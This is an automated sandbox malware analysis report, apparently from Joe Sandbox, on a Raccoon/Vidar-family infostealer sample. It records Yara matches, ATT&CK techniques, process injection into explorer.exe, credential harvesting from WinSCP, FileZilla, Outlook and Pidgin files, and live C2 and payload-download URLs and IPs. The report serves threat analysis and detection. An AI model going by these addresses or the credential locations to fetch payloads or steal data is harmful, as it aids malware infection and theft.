                              Source: Yara matchFile source: Process Memory Space: gntuud.exe PID: 5972, type: MEMORYSTR
                              Source: Yara matchFile source: 12.2.8F68.exe.c42a60.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 12.2.8F68.exe.c10000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 12.0.8F68.exe.c42a60.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 12.0.8F68.exe.c42a60.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 12.2.8F68.exe.c42a60.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000000C.00000000.404562471.0000000000C42000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000C.00000000.416200644.0000000000C42000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 8F68.exe PID: 1568, type: MEMORYSTR
                              Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                              Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
                              Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
                              Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml

                              Remote Access Functionality

                              barindex
                              Source: Yara matchFile source: 00000013.00000002.775997702.0000000000521000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000016.00000002.774640150.00000000006B1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1020, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR
                              Source: Yara matchFile source: 43.3.thgcici.490000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 11.2.thgcici.6a0e67.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 11.2.thgcici.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.kmxId0uLRn.exe.5d0e67.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.3.kmxId0uLRn.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.kmxId0uLRn.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 11.3.thgcici.2090000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 43.2.thgcici.470e67.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 43.2.thgcici.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000002B.00000003.588957160.0000000000490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000002B.00000002.605352083.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000003.263185446.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000B.00000002.458517384.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000B.00000002.458480142.00000000020D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.354414685.0000000000601000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.354377233.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000002B.00000002.603086862.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000000.344354545.0000000005791000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000B.00000003.425062940.0000000002090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 12.2.8F68.exe.c42a60.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 12.2.8F68.exe.c10000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 12.0.8F68.exe.c42a60.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 12.0.8F68.exe.c42a60.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 12.2.8F68.exe.c42a60.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000000C.00000000.404562471.0000000000C42000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000C.00000000.416200644.0000000000C42000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 8F68.exe PID: 1568, type: MEMORYSTR
                              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                              Valid Accounts1
                              Exploitation for Client Execution
                              1
                              DLL Side-Loading
                              1
                              Exploitation for Privilege Escalation
                              1
                              Deobfuscate/Decode Files or Information
                              1
                              OS Credential Dumping
                              2
                              System Time Discovery
                              Remote Services1
                              Archive Collected Data
                              Exfiltration Over Other Network Medium14
                              Ingress Tool Transfer
                              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                              Default Accounts1
                              Scheduled Task/Job
                              1
                              Scheduled Task/Job
                              1
                              DLL Side-Loading
                              2
                              Obfuscated Files or Information
                              1
                              Input Capture
                              1
                              Account Discovery
                              Remote Desktop Protocol1
                              Data from Local System
                              Exfiltration Over Bluetooth11
                              Encrypted Channel
                              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                              Domain AccountsAt (Linux)1
                              Registry Run Keys / Startup Folder
                              612
                              Process Injection
                              11
                              Software Packing
                              2
                              Credentials in Registry
                              2
                              File and Directory Discovery
                              SMB/Windows Admin Shares1
                              Screen Capture
                              Automated Exfiltration4
                              Non-Application Layer Protocol
                              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                              Local AccountsAt (Windows)1
                              Services File Permissions Weakness
                              1
                              Scheduled Task/Job
                              1
                              DLL Side-Loading
                              1
                              Credentials In Files
                              35
                              System Information Discovery
                              Distributed Component Object Model1
                              Email Collection
                              Scheduled Transfer125
                              Application Layer Protocol
                              SIM Card SwapCarrier Billing Fraud
                              Cloud AccountsCronNetwork Logon Script1
                              Registry Run Keys / Startup Folder
                              1
                              File Deletion
                              LSA Secrets231
                              Security Software Discovery
                              SSH1
                              Input Capture
                              Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                              Replication Through Removable MediaLaunchdRc.common1
                              Services File Permissions Weakness
                              11
                              Masquerading
                              Cached Domain Credentials2
                              Process Discovery
                              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                              External Remote ServicesScheduled TaskStartup ItemsStartup Items31
                              Virtualization/Sandbox Evasion
                              DCSync31
                              Virtualization/Sandbox Evasion
                              Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job612
                              Process Injection
                              Proc Filesystem1
                              Application Window Discovery
                              Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                              Hidden Files and Directories
                              /etc/passwd and /etc/shadow1
                              System Owner/User Discovery
                              Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                              Services File Permissions Weakness
                              Network Sniffing1
                              Remote System Discovery
                              Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                              Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                              Rundll32
                              Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 signatures2 2 Behavior Graph ID: 766457 Sample: kmxId0uLRn.exe Startdate: 13/12/2022 Architecture: WINDOWS Score: 100 87 Snort IDS alert for network traffic 2->87 89 Malicious sample detected (through community Yara rule) 2->89 91 Antivirus detection for URL or domain 2->91 93 9 other signatures 2->93 10 kmxId0uLRn.exe 2->10         started        13 thgcici 2->13         started        15 thgcici 2->15         started        17 2 other processes 2->17 process3 signatures4 119 Detected unpacking (changes PE section rights) 10->119 121 Maps a DLL or memory area into another process 10->121 123 Checks if the current machine is a virtual machine (disk enumeration) 10->123 19 explorer.exe 7 10->19 injected 125 Multi AV Scanner detection for dropped file 13->125 127 Machine Learning detection for dropped file 13->127 129 Creates a thread in another existing process (thread injection) 13->129 process5 dnsIp6 79 kikangalaassociates.com 185.98.131.207, 443, 49723 RMI-FITECHFR France 19->79 81 r3oidsofsios.com 185.246.221.151, 49699, 49700, 49701 LVLT-10753US Germany 19->81 83 31.41.244.228, 49726, 80 AEROEXPRESS-ASRU Russian Federation 19->83 65 C:\Users\user\AppData\Roaming\thgcici, PE32 19->65 dropped 67 C:\Users\user\AppData\Local\Temp\9545.exe, PE32 19->67 dropped 69 C:\Users\user\AppData\Local\Temp\8F68.exe, PE32 19->69 dropped 71 C:\Users\user\...\thgcici:Zone.Identifier, ASCII 19->71 dropped 103 System process connects to network (likely due to code injection or exploit) 19->103 105 Benign windows process drops PE files 19->105 107 Injects code into the Windows Explorer (explorer.exe) 19->107 109 3 other signatures 19->109 24 9545.exe 3 19->24         started        28 8F68.exe 1 19->28         started        30 explorer.exe 19->30         started        32 8 other processes 19->32 file7 signatures8 process9 file10 73 C:\Users\user\AppData\Local\...\gntuud.exe, PE32 24->73 dropped 111 Antivirus detection for dropped file 24->111 113 Multi AV Scanner detection for dropped file 24->113 115 Machine Learning detection for dropped file 24->115 117 Contains functionality to inject code into remote processes 24->117 34 gntuud.exe 18 24->34         started        39 WerFault.exe 4 10 28->39         started        41 conhost.exe 28->41         started        signatures11 process12 dnsIp13 75 62.204.41.79, 49735, 49736, 49738 TNNET-ASTNNetOyMainnetworkFI United Kingdom 34->75 61 C:\Users\user\AppData\Roaming\...\cred64.dll, PE32 34->61 dropped 63 C:\Users\user\AppData\Local\...\cred64[1].dll, PE32 34->63 dropped 95 Antivirus detection for dropped file 34->95 97 Multi AV Scanner detection for dropped file 34->97 99 Creates an undocumented autostart registry key 34->99 101 2 other signatures 34->101 43 rundll32.exe 34->43         started        47 cmd.exe 1 34->47         started        49 schtasks.exe 1 34->49         started        77 192.168.2.1 unknown unknown 39->77 file14 signatures15 process16 dnsIp17 85 192.168.2.3, 443, 49683, 49689 unknown unknown 43->85 131 System process connects to network (likely due to code injection or exploit) 43->131 133 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 43->133 135 Tries to steal Instant Messenger accounts or passwords 43->135 137 2 other signatures 43->137 51 conhost.exe 47->51         started        53 cmd.exe 47->53         started        55 cacls.exe 47->55         started        59 4 other processes 47->59 57 conhost.exe 49->57         started        signatures18 process19

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand
                              SourceDetectionScannerLabelLink
                              kmxId0uLRn.exe69%ReversingLabsWin32.Trojan.Raccoon
                              kmxId0uLRn.exe60%VirustotalBrowse
                              kmxId0uLRn.exe100%Joe Sandbox ML
                              SourceDetectionScannerLabelLink
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll100%AviraHEUR/AGEN.1233121
                              C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe100%AviraHEUR/AGEN.1253146
                              C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll100%AviraHEUR/AGEN.1233121
                              C:\Users\user\AppData\Local\Temp\9545.exe100%AviraHEUR/AGEN.1253146
                              C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\8F68.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\9545.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Roaming\thgcici100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll79%ReversingLabsWin32.Infostealer.Decred
                              C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe53%ReversingLabsWin32.Trojan.Lazy
                              C:\Users\user\AppData\Local\Temp\9545.exe53%ReversingLabsWin32.Trojan.Lazy
                              C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll79%ReversingLabsWin32.Infostealer.Decred
                              C:\Users\user\AppData\Roaming\thgcici69%ReversingLabsWin32.Trojan.Raccoon
                              SourceDetectionScannerLabelLinkDownload
                              43.2.thgcici.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                              11.3.thgcici.2090000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                              14.0.9545.exe.dd0000.3.unpack100%AviraHEUR/AGEN.1253146Download File
                              44.0.gntuud.exe.f00000.0.unpack100%AviraHEUR/AGEN.1253146Download File
                              29.2.gntuud.exe.f00000.0.unpack100%AviraHEUR/AGEN.1253146Download File
                              12.0.8F68.exe.c42a60.7.unpack100%AviraTR/Patched.Ren.GenDownload File
                              14.0.9545.exe.dd0000.0.unpack100%AviraHEUR/AGEN.1253146Download File
                              11.2.thgcici.6a0e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                              14.0.9545.exe.dd0000.2.unpack100%AviraHEUR/AGEN.1253146Download File
                              44.2.gntuud.exe.f00000.0.unpack100%AviraHEUR/AGEN.1253146Download File
                              12.2.8F68.exe.c42a60.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                              14.2.9545.exe.dd0000.0.unpack100%AviraHEUR/AGEN.1253146Download File
                              12.0.8F68.exe.c42a60.5.unpack100%AviraTR/Patched.Ren.GenDownload File
                              21.2.gntuud.exe.f00000.0.unpack100%AviraHEUR/AGEN.1253146Download File
                              14.0.9545.exe.dd0000.1.unpack100%AviraHEUR/AGEN.1253146Download File
                              21.0.gntuud.exe.f00000.0.unpack100%AviraHEUR/AGEN.1253146Download File
                              0.3.kmxId0uLRn.exe.5e0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                              11.2.thgcici.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                              0.2.kmxId0uLRn.exe.5d0e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                              43.3.thgcici.490000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                              43.2.thgcici.470e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                              29.0.gntuud.exe.f00000.0.unpack100%AviraHEUR/AGEN.1253146Download File
                              0.2.kmxId0uLRn.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                              SourceDetectionScannerLabelLink
                              r3oidsofsios.com3%VirustotalBrowse
                              kikangalaassociates.com0%VirustotalBrowse
                              SourceDetectionScannerLabelLink
                              62.204.41.79/fb73jc3/index.php0%Avira URL Cloudsafe
                              http://62.204.41.79/fb73jc3/index.php?scr=1t&0%Avira URL Cloudsafe
                              http://62.204.41.79/fb73jc3/index.php?scr=10%Avira URL Cloudsafe
                              http://62.204.41.79/fb73jc3/index.php?scr=1l&0%Avira URL Cloudsafe
                              http://62.204.41.79/fb73jc3/Plugins/cred64.dll100%Avira URL Cloudmalware
                              http://62.204.41.79/fb73jc3/index.phpa0%Avira URL Cloudsafe
                              http://62.204.41.79/fb73jc3/index.phpg0%Avira URL Cloudsafe
                              http://62.204.41.79/fb73jc3/index.php?scr=1T)0%Avira URL Cloudsafe
                              http://62.204.41.79/fb73jc3/index.phpM0%Avira URL Cloudsafe
                              http://62.204.41.79/fb0%Avira URL Cloudsafe
                              http://62.204.41.79/fb73jc3/index.phpcu0%Avira URL Cloudsafe
                              http://62.204.41.79/fb73jc3/Plugins/cred64.dllXIK0%Avira URL Cloudsafe
                              http://62.204.41.79/fbfb73jc3/index.php0%Avira URL Cloudsafe
                              http://62.204.41.79/fb73jc3/index.php0%Avira URL Cloudsafe
                              http://62.204.41.79/fb73jc3/index.phpwu$0%Avira URL Cloudsafe
                              http://62.204.41.79/fb73jc3/index.phpqu.0%Avira URL Cloudsafe
                              https://kikangalaassociates.com/vidar2.exe0%Avira URL Cloudsafe
                              http://s2scomm20.com/100%Avira URL Cloudmalware
                              http://c2csosi228d.com/100%Avira URL Cloudmalware
                              http://31.41.244.228/fusa/bibar.exe100%Avira URL Cloudmalware
                              http://95.217.27.105:800%Avira URL Cloudsafe
                              http://xdd42sdfsdf.com/100%Avira URL Cloudmalware
                              http://r3oidsofsios.com/Mozilla/5.00%Avira URL Cloudsafe
                              http://62.204.41.79/fb73jc3/index.phpF0%Avira URL Cloudsafe
                              http://r3oidsofsios.com/0%Avira URL Cloudsafe
                              NameIPActiveMaliciousAntivirus DetectionReputation
                              r3oidsofsios.com
                              185.246.221.151
                              truetrueunknown
                              kikangalaassociates.com
                              185.98.131.207
                              truetrueunknown
                              NameMaliciousAntivirus DetectionReputation
                              https://steamcommunity.com/profiles/76561199443972360false
                                high
                                62.204.41.79/fb73jc3/index.phptrue
                                • Avira URL Cloud: safe
                                low
                                http://62.204.41.79/fb73jc3/index.php?scr=1true
                                • Avira URL Cloud: safe
                                unknown
                                https://kikangalaassociates.com/vidar2.exefalse
                                • Avira URL Cloud: safe
                                unknown
                                http://62.204.41.79/fb73jc3/Plugins/cred64.dlltrue
                                • Avira URL Cloud: malware
                                unknown
                                http://31.41.244.228/fusa/bibar.exetrue
                                • Avira URL Cloud: malware
                                unknown
                                http://c2csosi228d.com/true
                                • Avira URL Cloud: malware
                                unknown
                                http://s2scomm20.com/true
                                • Avira URL Cloud: malware
                                unknown
                                http://62.204.41.79/fb73jc3/index.phptrue
                                • Avira URL Cloud: safe
                                unknown
                                https://t.me/ttruelivefalse
                                  high
                                  http://xdd42sdfsdf.com/true
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://r3oidsofsios.com/true
                                  • Avira URL Cloud: safe
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://62.204.41.79/fb73jc3/index.php?scr=1t&gntuud.exe, 00000015.00000002.787565484.0000000000C39000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.google.com/searchexplorer.exe, 0000001F.00000002.776413883.0000000003441000.00000040.80000000.00040000.00000000.sdmpfalse
                                    high
                                    http://62.204.41.79/fb73jc3/index.php?scr=1l&gntuud.exe, 00000015.00000003.499244475.0000000000C39000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://go.mail.ru/searchexplorer.exe, 0000001F.00000002.776413883.0000000003441000.00000040.80000000.00040000.00000000.sdmpfalse
                                      high
                                      http://62.204.41.79/fb73jc3/index.phpagntuud.exe, 00000015.00000002.785290818.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000003.499661889.0000000000BF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://nova.rambler.ru/searchexplorer.exe, 0000001F.00000002.776413883.0000000003441000.00000040.80000000.00040000.00000000.sdmpfalse
                                        high
                                        http://62.204.41.79/fbgntuud.exe, 00000015.00000003.499113255.0000000000C1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://62.204.41.79/fb73jc3/index.phpggntuud.exe, 00000015.00000003.499037932.0000000000C14000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://t.me/ttruelivehttps://steamcommunity.com/profiles/76561199443972360http://95.217.27.105:80hi8F68.exe, 0000000C.00000000.404562471.0000000000C42000.00000004.00000001.01000000.00000009.sdmpfalse
                                          high
                                          http://search.yahoo.com/searchexplorer.exe, 0000001F.00000002.776413883.0000000003441000.00000040.80000000.00040000.00000000.sdmpfalse
                                            high
                                            http://62.204.41.79/fb73jc3/index.php?scr=1T)gntuud.exe, 00000015.00000002.787565484.0000000000C39000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000003.499244475.0000000000C39000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://62.204.41.79/fb73jc3/index.phpcugntuud.exe, 00000015.00000002.786384130.0000000000C14000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://search.aol.com/aol/searchexplorer.exe, 0000001F.00000002.776413883.0000000003441000.00000040.80000000.00040000.00000000.sdmpfalse
                                              high
                                              http://62.204.41.79/fb73jc3/index.phpMgntuud.exe, 00000015.00000002.786658213.0000000000C1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://62.204.41.79/fbfb73jc3/index.phpgntuud.exe, 00000015.00000002.786658213.0000000000C1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://62.204.41.79/fb73jc3/Plugins/cred64.dllXIKgntuud.exe, 00000015.00000003.498981390.0000000000C04000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000002.785970616.0000000000C07000.00000004.00000020.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://62.204.41.79/fb73jc3/index.phpqu.gntuud.exe, 00000015.00000003.499037932.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000002.786384130.0000000000C14000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://62.204.41.79/fb73jc3/index.phpwu$gntuud.exe, 00000015.00000003.499037932.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000002.786384130.0000000000C14000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://r3oidsofsios.com/Mozilla/5.0explorer.exe, 00000011.00000000.405174014.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000012.00000002.775161398.0000000001090000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.413703435.0000000000EE0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000013.00000002.779312783.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000000.417309353.0000000000530000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.775858605.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.420551387.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000001A.00000002.780502207.0000000003377000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001F.00000000.426593885.0000000003450000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000022.00000000.429438818.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000026.00000000.432495432.00000000004E0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000026.00000002.777038253.0000000000650000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000028.00000000.435504290.0000000000530000.00000040.80000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://95.217.27.105:808F68.exe, 0000000C.00000000.404562471.0000000000C42000.00000004.00000001.01000000.00000009.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://62.204.41.79/fb73jc3/index.phpFgntuud.exe, 00000015.00000003.499113255.0000000000C1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              31.41.244.228
                                              unknownRussian Federation
                                              61974AEROEXPRESS-ASRUtrue
                                              185.246.221.151
                                              r3oidsofsios.comGermany
                                              10753LVLT-10753UStrue
                                              62.204.41.79
                                              unknownUnited Kingdom
                                              30798TNNET-ASTNNetOyMainnetworkFItrue
                                              185.98.131.207
                                              kikangalaassociates.comFrance
                                              16347RMI-FITECHFRtrue
                                              IP
                                              192.168.2.1
                                              192.168.2.3
                                              Joe Sandbox Version:36.0.0 Rainbow Opal
                                              Analysis ID:766457
                                              Start date and time:2022-12-13 20:06:50 +01:00
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 15m 39s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:kmxId0uLRn.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:46
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.phis.troj.spyw.evad.winEXE@51/18@28/6
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HDC Information:
                                              • Successful, ratio: 60.2% (good quality ratio 54.3%)
                                              • Quality average: 71.8%
                                              • Quality standard deviation: 32.3%
                                              HCA Information:
                                              • Successful, ratio: 93%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Override analysis time to 240s for rundll32
                                              • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                              • TCP Packets have been reduced to 100
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 20.42.73.29
                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, watson.telemetry.microsoft.com
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size exceeded maximum capacity and may have missing network information.
                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                              TimeTypeDescription
                                              20:08:51Task SchedulerRun new task: Firefox Default Browser Agent 4D11EF12B087A959 path: C:\Users\user\AppData\Roaming\thgcici
                                              20:09:07Task SchedulerRun new task: gntuud.exe path: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe
                                              20:09:07API Interceptor1283x Sleep call for process: explorer.exe modified
                                              20:09:07API Interceptor1401x Sleep call for process: gntuud.exe modified
                                              20:09:15API Interceptor1x Sleep call for process: WerFault.exe modified
                                              No context
                                              No context
                                              No context
                                              No context
                                              No context
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):0.6772632143876667
                                              Encrypted:false
                                              SSDEEP:96:Yl7FpFaefLzFhBX7kRC6tpXIQcQvc6QcEDMcw3Db+HbHg/8BRTf3OyWZAXGng5FA:YRjFaUsHBUZMXYjuq/u7sqS274ItL7
                                              MD5:3B1C322E839ACACBA456FEDD9F393D9E
                                              SHA1:1901D98FC6CC533884C755A93835ACD0B683EE47
                                              SHA-256:D21A2F3BDE2CDB1E09E849A1953EAB93FC493182E98400C910AED2C54FD563B8
                                              SHA-512:5C9335AE5292820E5E5B73C28C869B3B9134080D2E2CAA2368816A02B46C21C1BE0D2FA43C713ED610AF1A34376B3C2415E9B376FEDD1217E670EE0A32EA667C
                                              Malicious:false
                                              Reputation:unknown
